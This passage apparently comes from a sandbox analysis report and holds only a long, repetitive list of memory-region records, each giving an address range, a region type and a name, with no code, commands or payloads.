0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13086 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13087 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13088 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13089 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13090 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13091 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13092 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13093 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13094 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13095 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13096 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13097 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13098 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13099 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13100 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13101 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13102 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13103 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13104 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13105 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13106 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13107 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13108 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13109 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13110 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13111 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13112 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13113 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13114 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13115 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13116 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13117 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13118 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13119 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13120 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13121 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13122 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13123 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13124 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13125 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13126 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13127 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13128 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13129 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13130 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13131 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13132 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13133 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13134 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13135 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13136 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13137 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13138 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13139 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13140 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13141 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13142 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13143 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13144 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13145 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13146 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13147 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13148 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13149 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13150 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13151 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13152 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13153 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13154 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13155 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13156 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13157 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13158 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13159 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13160 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13161 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13162 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13163 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13164 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13165 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13166 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13167 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13168 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13169 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13170 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13171 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13172 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13173 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13174 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13175 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13176 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13177 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13178 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13179 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13180 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13181 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13182 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13183 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13184 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13187 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13188 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13193 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13194 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13195 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13196 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13197 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13198 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13199 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13200 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13201 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13202 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13204 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13205 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13206 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13219 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13220 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13221 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13222 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13223 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13224 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13225 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13226 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13227 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13228 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13229 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13230 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13231 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13232 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13233 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13234 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13235 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13236 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13237 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13238 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13239 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13240 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13241 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13242 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13243 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13246 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13247 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13248 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13249 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13250 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13251 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13253 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13254 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13255 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13256 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13258 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13259 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13270 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13271 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13273 start_va = 0x530000 end_va = 